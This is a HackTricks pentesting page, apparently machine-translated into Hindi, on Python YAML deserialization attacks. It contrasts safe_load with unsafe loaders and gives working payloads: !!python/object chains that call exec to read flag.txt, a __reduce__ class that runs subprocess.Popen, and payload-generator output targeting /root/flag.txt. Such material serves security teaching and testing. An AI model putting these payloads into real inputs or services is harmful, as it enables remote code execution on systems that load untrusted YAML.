जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! दूसरे तरीके HackTricks का समर्थन करने के लिए: * अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
# Yaml **डिसीरियलाइजेशन** **Yaml** python पुस्तकालय भी **पायथन ऑब्जेक्ट्स को सिर्फ रॉ डेटा** ही नहीं, **सिरीयलाइज़** करने में सक्षम है: ``` print(yaml.dump(str("lol"))) lol ... print(yaml.dump(tuple("lol"))) !!python/tuple - l - o - l print(yaml.dump(range(1,10))) !!python/object/apply:builtins.range - 1 - 10 - 1 ``` जांचें कि **tuple** एक कच्चा प्रकार का डेटा नहीं है और इसलिए इसे **सिरीकरण** किया गया था। और यही हुआ **range** के साथ भी (builtins से लिया गया)। ![](<../../.gitbook/assets/image (628) (1).png>) **safe\_load()** या **safe\_load\_all()** SafeLoader का उपयोग करते हैं और **क्लास ऑब्जेक्ट डेसीरियलाइज़ेशन का समर्थन नहीं करते**। क्लास ऑब्जेक्ट डेसीरियलाइज़ेशन उदाहरण: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:builtins.range [1, 10, 1]' print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10) print(yaml.load(data, Loader=Loader)) #range(1, 10) print(yaml.load_all(data)) # print(yaml.load_all(data, Loader=Loader)) # print(yaml.load_all(data, Loader=UnsafeLoader)) # print(yaml.load_all(data, Loader=FullLoader)) # print(yaml.unsafe_load(data)) #range(1, 10) print(yaml.full_load_all(data)) # print(yaml.unsafe_load_all(data)) # #The other ways to load data will through an error as they won't even attempt to #deserialize the python object ``` पिछला कोड **unsafe\_load** का उपयोग सीरीयलाइज्ड पायथन क्लास लोड करने के लिए किया गया था। यह इसलिए है क्योंकि **संस्करण >= 5.1** में, यह किसी भी सीरीयलाइज्ड पायथन क्लास या क्लास एट्रिब्यूट को **डीसीरियलाइज़** करने की अनुमति नहीं देता है, Loader not specified in load() or Loader=SafeLoader। ## मूल अभिशाप **नींद को चालू करने** के लिए एक उदाहरण: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:time.sleep [2]' print(yaml.load(data, Loader=UnsafeLoader)) #Executed print(yaml.load(data, Loader=Loader)) #Executed print(yaml.load_all(data)) print(yaml.load_all(data, Loader=Loader)) print(yaml.load_all(data, Loader=UnsafeLoader)) print(yaml.load_all(data, Loader=FullLoader)) print(yaml.unsafe_load(data)) #Executed print(yaml.full_load_all(data)) print(yaml.unsafe_load_all(data)) ``` ## जोखिमपूर्ण .load("\") लोडर के बिना पुराने संस्करणों में pyyaml जोखिमपूर्ण थे अगर आप कुछ लोड करते समय लोडर को स्पष्ट नहीं किया: `yaml.load(data)` आप यहाँ [**वुलनरेबिलिटी का विवरण पा सकते हैं**](https://hackmd.io/@defund/HJZajCVlP)**.** उस पृष्ठ में प्रस्तावित **उत्पीड़न** है: ```yaml !!python/object/new:str state: !!python/tuple - 'print(getattr(open("flag\x2etxt"), "read")())' - !!python/object/new:Warning state: update: !!python/name:exec ``` या आप इस **वन-लाइनर का उपयोग भी कर सकते हैं जो @ishaack द्वारा प्रदान किया गया है**: ```yaml !!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]} ``` नोट करें कि **हाल के संस्करणों** में आप **अब `.load()` को नहीं कह सकते** हैं **बिना `Loader`** और **`FullLoader`** इस हमले के लिए **अब असंरक्षित** नहीं है। # RCE कस्टम payloads को बनाने के लिए Python YAML modules जैसे **PyYAML** या **ruamel.yaml** का उपयोग किया जा सकता है। ये payloads उन systems में दोषों का शोषण कर सकते हैं जो अविश्वसनीय इनपुट को उचित सेनिटाइज़ेशन के बिना डीसीरियलाइज़ करते हैं। ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader import subprocess class Payload(object): def __reduce__(self): return (subprocess.Popen,('ls',)) deserialized_data = yaml.dump(Payload()) # serializing data print(deserialized_data) #!!python/object/apply:subprocess.Popen #- ls print(yaml.load(deserialized_data, Loader=UnsafeLoader)) print(yaml.load(deserialized_data, Loader=Loader)) print(yaml.unsafe_load(deserialized_data)) ``` ## उपकरण पेयलोड बनाने के लिए यह उपकरण [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) का उपयोग किया जा सकता है ताकि **Pickle, PyYAML, jsonpickle और ruamel.yaml** का दुरुपयोग करने के लिए पायथन डिसीरियलाइज़ेशन पेयलोड उत्पन्न किया जा सके: ```bash python3 peas.py Enter RCE command :cat /root/flag.txt Enter operating system of target [linux/windows] . Default is linux :linux Want to base64 encode payload ? [N/y] : Enter File location and name to save :/tmp/example Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All Done Saving file !!!! cat /tmp/example_jspick {"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]} cat /tmp/example_pick | base64 -w0 gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg== cat /tmp/example_yaml !!python/object/apply:subprocess.Popen - !!python/tuple - cat - /root/flag.txt ``` ## संदर्भ * [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) * [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html)
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! HackTricks का समर्थन करने के अन्य तरीके: * यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें! * प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) * खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। * **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।